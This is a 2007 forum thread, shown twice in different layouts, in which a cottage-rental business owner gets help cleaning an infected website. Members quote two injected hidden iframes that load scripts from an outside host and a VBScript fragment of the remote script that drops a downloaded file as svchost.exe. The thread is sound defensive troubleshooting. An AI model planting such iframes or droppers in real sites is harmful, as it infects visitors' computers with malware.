Urgent help regarding malware virus on website

martin1973 · 16th April 2007, 18:33

Hi

Ive my own business and website www.goosemirecottages.co.uk and received the following email

-
Hi
I am looking for accommodation in the Lake District and landed on your web
site. The following link
http://www.goosemirecottages.co.uk/s...pertyID=447176
resulted in a virus report from 2 different anti-virus products. The file in
question is hker[1].htm. The suspected virus is called Exploit-MS06-014
(Trojan).
Any thoughts?
Regards
Tony
--

Anyway i checked the link and there is a virus which kaspersky picks up, but it seems to be on all of the sites pages.

Could the email have been a hoax and downloaded a virus onto the site, any other idea how a virus could be put onto the site and how could it be removed?

Thanks for your help

Rich · 16th April 2007, 18:55

Not picking up any virus warnings from that URL (that doesn't mean to say that it's "clean" though).

One thing to note straight away, the site is open to SQL injection and therefore anything is possible.

Get it secured asap Martin!

GreyGhost · 16th April 2007, 19:01

Not really familiar but would you expect to see these two lines of code on your home and other pages.

<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>

Rich · 16th April 2007, 19:01

And slightly off topic, did you know that kate@netizen is getting a copy of every "contact us" form filled in?

Rich · 16th April 2007, 19:03

Quote:

Originally Posted by Grey Ghost

Not really familiar but would you expect to see these two lines of code on your home and other pages.

<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>

Gotta love firefox, thats why I wasn't seeing anything bad

FYI Martin, the hker.htm file tries to do some very naughty things:

Quote:

fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close

GreyGhost · 16th April 2007, 19:06

Would deleting those lines resolve the problem?

Safari BTW.

Rich · 16th April 2007, 19:09

Quote:

Originally Posted by Grey Ghost

Would deleting those lines resolve the problem?

Sure would, those two lines are calling the malware scripts from the goldunix.com site.

Any number of ways your site could have become infected Martin, but I'd start by first securing the SQL vulnerabilities as people can inject anything they want to your site currently

Safari

GreyGhost · 16th April 2007, 19:11

In any event keep a clean copy to upload and replace the current one if this or any other problem occurs.

martin1973 · 16th April 2007, 19:20

Can i have a swear filter switched on briefly?

Some spotty gimp will have been sat at home with his porn mags and flask of orange juice all night hatching this evil plan, they should cut their hands off!

Rant over for now...

Thanks for the replies guys

Rich - what is SQL injection and how do you secure the site from this?
(have checked on laptop and got Dad to check site on his PC and all get the same virus warning, all PCs are running Kaspersky, but it cant just be a virus on my system must be within the site pages)

--
Greyghost - no those lines of code shouldnt be on the pages, when i go onto the site kaspersky warning window pops up with malware - Exploit.JS.ADODB.Stream.y
file - http://www.goldunix.com/hker.htm

Which explains the lines of dodgy text you noticed refering to goldunix

--
Rich - yes Netizen were the original site designers they get a copy of all enquiry forms so nothing to worry about there (came in handy as when i was with AOL a few years ago they were filtering out loads of the enquiries thinking they were spam emails, in 3 weeks i hadnt received over 100 enquiries, so soon booted AOL out. AOL spam filters see email addresses like [email protected] or [email protected] as spam

-
Rich again :lol: What exactly are the files trying to do?

--

Ok so any idea guys how i remove the nasties and also any idea how they got on the site in the first place and how can it be made more secure?

GreyGhost · 16th April 2007, 19:32

Either download the site and delete both lines of code from each page then upload again replacing the live site..
Or remove live site altogether and upload your backup clean copy of your site.
It is those two lines that are compromising your site.

Rich will advise on protection.

16th April 2007, 18:33	#1
martin1973 Loves to post MG ZT Join Date: Jan 2007 Location: Kendal, Cumbria Posts: 456 Thanks: 0 Thanked 0 Times in 0 Posts	Urgent help regarding malware virus on website Hi Ive my own business and website www.goosemirecottages.co.uk and received the following email - Hi I am looking for accommodation in the Lake District and landed on your web site. The following link http://www.goosemirecottages.co.uk/s...pertyID=447176 resulted in a virus report from 2 different anti-virus products. The file in question is hker[1].htm. The suspected virus is called Exploit-MS06-014 (Trojan). Any thoughts? Regards Tony -- Anyway i checked the link and there is a virus which kaspersky picks up, but it seems to be on all of the sites pages. Could the email have been a hoax and downloaded a virus onto the site, any other idea how a virus could be put onto the site and how could it be removed? Thanks for your help

16th April 2007, 18:55	#2
Rich Posted a thing or two http://Roadca.ms - Letting you see what they see! Join Date: Nov 2006 Location: Yup Posts: 1,786 Thanks: 0 Thanked 7 Times in 1 Post	Not picking up any virus warnings from that URL (that doesn't mean to say that it's "clean" though). One thing to note straight away, the site is open to SQL injection and therefore anything is possible. Get it secured asap Martin! __________________ https://VehicleGPS.UK http://www.MotorwayCameras.co.uk

16th April 2007, 19:01	#4
Rich Posted a thing or two http://Roadca.ms - Letting you see what they see! Join Date: Nov 2006 Location: Yup Posts: 1,786 Thanks: 0 Thanked 7 Times in 1 Post	And slightly off topic, did you know that kate@netizen is getting a copy of every "contact us" form filled in? __________________ https://VehicleGPS.UK http://www.MotorwayCameras.co.uk

16th April 2007, 19:01	#3
GreyGhost Banned 180+ Sport Auto Join Date: Oct 2006 Location: Bedford Middle Level Posts: 17,787 Thanks: 0 Thanked 18 Times in 5 Posts	Not really familiar but would you expect to see these two lines of code on your home and other pages. <iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe> <iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>

16th April 2007, 19:06	#6
GreyGhost Banned 180+ Sport Auto Join Date: Oct 2006 Location: Bedford Middle Level Posts: 17,787 Thanks: 0 Thanked 18 Times in 5 Posts	Would deleting those lines resolve the problem? Safari BTW.

16th April 2007, 19:11	#8
GreyGhost Banned 180+ Sport Auto Join Date: Oct 2006 Location: Bedford Middle Level Posts: 17,787 Thanks: 0 Thanked 18 Times in 5 Posts	In any event keep a clean copy to upload and replace the current one if this or any other problem occurs.

16th April 2007, 19:20	#9
martin1973 Loves to post MG ZT Join Date: Jan 2007 Location: Kendal, Cumbria Posts: 456 Thanks: 0 Thanked 0 Times in 0 Posts	Can i have a swear filter switched on briefly? Some spotty gimp will have been sat at home with his porn mags and flask of orange juice all night hatching this evil plan, they should cut their hands off! Rant over for now... Thanks for the replies guys Rich - what is SQL injection and how do you secure the site from this? (have checked on laptop and got Dad to check site on his PC and all get the same virus warning, all PCs are running Kaspersky, but it cant just be a virus on my system must be within the site pages) -- Greyghost - no those lines of code shouldnt be on the pages, when i go onto the site kaspersky warning window pops up with malware - Exploit.JS.ADODB.Stream.y file - http://www.goldunix.com/hker.htm Which explains the lines of dodgy text you noticed refering to goldunix -- Rich - yes Netizen were the original site designers they get a copy of all enquiry forms so nothing to worry about there (came in handy as when i was with AOL a few years ago they were filtering out loads of the enquiries thinking they were spam emails, in 3 weeks i hadnt received over 100 enquiries, so soon booted AOL out. AOL spam filters see email addresses like [email protected] or [email protected] as spam - Rich again :lol: What exactly are the files trying to do? -- Ok so any idea guys how i remove the nasties and also any idea how they got on the site in the first place and how can it be made more secure?

16th April 2007, 19:32	#10
GreyGhost Banned 180+ Sport Auto Join Date: Oct 2006 Location: Bedford Middle Level Posts: 17,787 Thanks: 0 Thanked 18 Times in 5 Posts	Either download the site and delete both lines of code from each page then upload again replacing the live site.. Or remove live site altogether and upload your backup clean copy of your site. It is those two lines that are compromising your site. Rich will advise on protection.